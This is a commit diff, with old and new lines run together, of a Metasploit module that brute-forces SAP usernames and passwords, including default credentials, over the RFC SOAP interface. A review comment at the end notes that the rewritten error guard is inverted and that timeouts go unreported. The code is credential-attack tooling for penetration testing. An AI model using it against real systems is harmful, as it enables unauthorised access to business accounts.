made requested changes

unstable
nmonkee 2012-11-15 00:00:31 +00:00
parent 6b7b8f7265
commit 62f9766e63
1 changed files with 26 additions and 28 deletions


@ -1,15 +1,15 @@
## ##
# This file is part of the Metasploit Framework and may be subject to # This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit # redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use. # Framework web site for more information on licensing and terms of use.
# http://metasploit.com/ # http://metasploit.com/framework/
## ##
## ##
# This module is based on, inspired by, or is a port of a plugin available in # This module is based on, inspired by, or is a port of a plugin available in
# the Onapsis Bizploit Opensource ERP Penetration Testing framework - # the Onapsis Bizploit Opensource ERP Penetration Testing framework -
# http://www.onapsis.com/research-free-solutions.php. # http://www.onapsis.com/research-free-solutions.php.
# Mariano Nuñez (the author of the Bizploit framework) helped me in my efforts # Mariano Nunez (the author of the Bizploit framework) helped me in my efforts
# in producing the Metasploit modules and was happy to share his knowledge and # in producing the Metasploit modules and was happy to share his knowledge and
# experience - a very cool guy. I'd also like to thank Chris John Riley, # experience - a very cool guy. I'd also like to thank Chris John Riley,
# Ian de Villiers and Joris van de Vis who have Beta tested the modules and # Ian de Villiers and Joris van de Vis who have Beta tested the modules and
@ -28,20 +28,20 @@ class Metasploit4 < Msf::Auxiliary
def initialize def initialize
super( super(
'Name' => 'SAP SOAP RFC Brute Forcer (via RFC_PING)', 'Name' => 'SAP SOAP RFC Brute Forcer (via RFC_PING)',
'Version' => '$Revision$',
'Description' => %q{ 'Description' => %q{
This module attempts to brute force the username | password via an RFC interface (over SOAP). This module attempts to brute force the username | password via an RFC
Default clients can be tested without needing to set a CLIENT. interface (over SOAP). Default clients can be tested without needing to set a
Common/Default user and password combinations can be tested without needing to set a USERNAME, PASSWORD, USER_FILE or PASS_FILE. CLIENT. Common/Default user and password combinations can be tested without needing
The default usernames and password combinations are stored in ./data/wordlists/sap_default.txt. to set a USERNAME, PASSWORD, USER_FILE or PASS_FILE. The default usernames and
password combinations are stored in ./data/wordlists/sap_default.txt.
}, },
'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]], 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]],
'Author' => [ 'Agnivesh Sathasivam','nmonkee' ], 'Author' => [ 'Agnivesh Sathasivam','nmonkee' ],
'License' => BSD_LICENSE 'License' => BSD_LICENSE
) )
register_options([ register_options([
OptEnum.new('CLIENT', [false, 'Client can be single (066), comma seperated list (000,001,066) or range (000-999)', '000,001,066']), OptString.new('CLIENT', [false, 'Client can be single (066), comma seperated list (000,001,066) or range (000-999)', '000,001,066']),
OptBool.new('DEFAULT_CRED',[false, 'Check using the defult password and username',true]), OptBool.new('DEFAULT_CRED',[false, 'Check using the defult password and username',true])
], self.class) ], self.class)
register_autofilter_ports([ 8000 ]) register_autofilter_ports([ 8000 ])
end end
@ -86,8 +86,8 @@ class Metasploit4 < Msf::Auxiliary
credentials.each do |u, p| credentials.each do |u, p|
client.each do |cli| client.each do |cli|
success = bruteforce(u, p, cli) success = bruteforce(u, p, cli)
if success == true if success
saptbl << [ datastore['RHOST'], datastore['RPORT'], cli, u, p] saptbl << [ rhost, rport, cli, u, p]
end end
end end
end end
@ -95,8 +95,8 @@ class Metasploit4 < Msf::Auxiliary
each_user_pass do |u, p| each_user_pass do |u, p|
client.each do |cli| client.each do |cli|
success = bruteforce(u, p, cli) success = bruteforce(u, p, cli)
if success == true if success
saptbl << [ datastore['RHOST'], datastore['RPORT'], cli, u, p] saptbl << [ rhost, rport, cli, u, p]
end end
end end
end end
@ -128,26 +128,24 @@ class Metasploit4 < Msf::Auxiliary
'Authorization' => 'Basic ' + user_pass, 'Authorization' => 'Basic ' + user_pass,
'Content-Type' => 'text/xml; charset=UTF-8'} 'Content-Type' => 'text/xml; charset=UTF-8'}
}, 45) }, 45)
if res.code == 401 if res and res.code == 401
success = false success = false
return success return success
elsif res.code == 500 elsif res and res.code == 500
response = res.body response = res.body
error.push(response.scan(%r{<faultstring>(.*?)</faultstring>})) error.push(response.scan(%r{<faultstring>(.*?)</faultstring>}))
error.push(response.scan(%r{<message>(.*?)</message>})) error.push(response.scan(%r{<message>(.*?)</message>}))
success = false success = false
elsif res.code == 200 elsif res and res.code == 200
success = true success = true
return success return success
elsif res.body =~ /Response/
#puts res
end end
if success == false if success
err = error.join().chomp err = error.join.chomp
print_error("#{datastore['RHOSTS']}:#{datastore['RPORT']} -#{err} - #{client}:#{username}:#{password}") print_error("[SAP] #{rhost}:#{rport} - #{err} - #{client}:#{username}:#{password}")
end end
rescue ::Rex::ConnectionError rescue ::Rex::ConnectionError
print_error("#{datastore['RHOST']}:#{datastore['RPORT']} - Unable to connect") print_error("[SAP] #{rhost}:#{rport} - Unable to connect")
return return
end end
end end
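Review bot: The rewritten guard `if success` near the end of the last hunk looks inverted relative to the old `if success == false`. On the new side the 200 branch returns before reaching it and the 500 branch sets `success = false`, so the `print_error` carrying the parsed `<faultstring>`/`<message>` text can no longer fire; `unless success` would keep the earlier behaviour. Separately, when `res` is nil (for example after the 45-second timeout) none of the `res and res.code == ...` branches match and the method falls through without reporting anything, so an explicit early check such as `return false unless res`, with a message, would make that case visible. The method starts outside the hunk, so whether `success` and `error` are initialised before this point cannot be confirmed from here.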